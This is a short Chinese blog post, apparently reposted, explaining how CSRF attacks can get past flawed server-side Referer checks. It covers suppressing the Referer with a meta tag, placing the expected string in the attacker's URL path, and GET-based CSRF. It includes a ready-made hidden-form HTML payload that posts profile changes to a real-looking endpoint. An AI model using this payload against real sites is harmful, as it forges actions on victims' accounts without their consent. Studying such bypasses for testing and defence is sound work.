• CSRF绕过后端Referer校验


    CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。

    正常情况

    正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。

    我之前考虑过的方案:

    • JS修改Referer,失败;
    • 让用户点击第三方网站,但是浏览器就是使用第三方网站的referer,失败;

    不正常的情况

    不正常的情况指服务器端校验Referer的代码有漏洞,前端才能做到绕过,下面介绍几个可能会绕过Referer的案例;

    添加无Referer标签

    可以尝试无Referer标签,万一逻辑刚好没判断无Referer的情况呢;

    <meta name="referrer" content="never">

    <html>
      <meta name="referrer" content="never">
      <body>
      <script>history.pushState('', '', '/')</script>  <!-- 实现浏览器页面不刷新修改url链接 -->
        <form action="http://www.baidu.com/setProfile" method="POST">
          <input type="hidden" name="nickname" value="new22" />
          <input type="hidden" name="email" value="1&#64;1&#46;com" />
          <input type="hidden" name="team" value="new22" />
          <input type="hidden" name="address" value="new33" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

    Web站点路径带着referer字段名

    原理就是在恶意网站的访问路径上创建成包含原本referer中有的字段名,如果服务端的校验规则只是判断是否包含,那就666了;


    GET型CSRF

    检验了HTTP Referer就一点问题都没有了吗?答案是:否定的,HTTP Referer只能检查点击的链接来源是来自站内还是站外,如果是GET方式的CSRF,那链接本身就是站内的,也就意味着检验HTTP Referer是无效的。

  • 相关阅读:
    BZOJ1093: [ZJOI2007]最大半连通子图
    BZOJ4033: [HAOI2015]树上染色
    BZOJ1977: [BeiJing2010组队]次小生成树 Tree
    BZOJ4944: [Noi2017]泳池
    BZOJ1269: [AHOI2006]文本编辑器editor
    BZOJ4596: [Shoi2016]黑暗前的幻想乡
    BZOJ1815: [Shoi2006]color 有色图
    BZOJ1488: [HNOI2009]图的同构
    BZOJ3527: [Zjoi2014]力
    Salazar Slytherin's Locket CodeForces
  • 原文地址:https://www.cnblogs.com/mysticbinary/p/12161537.html
Copyright © 2020-2023  润新知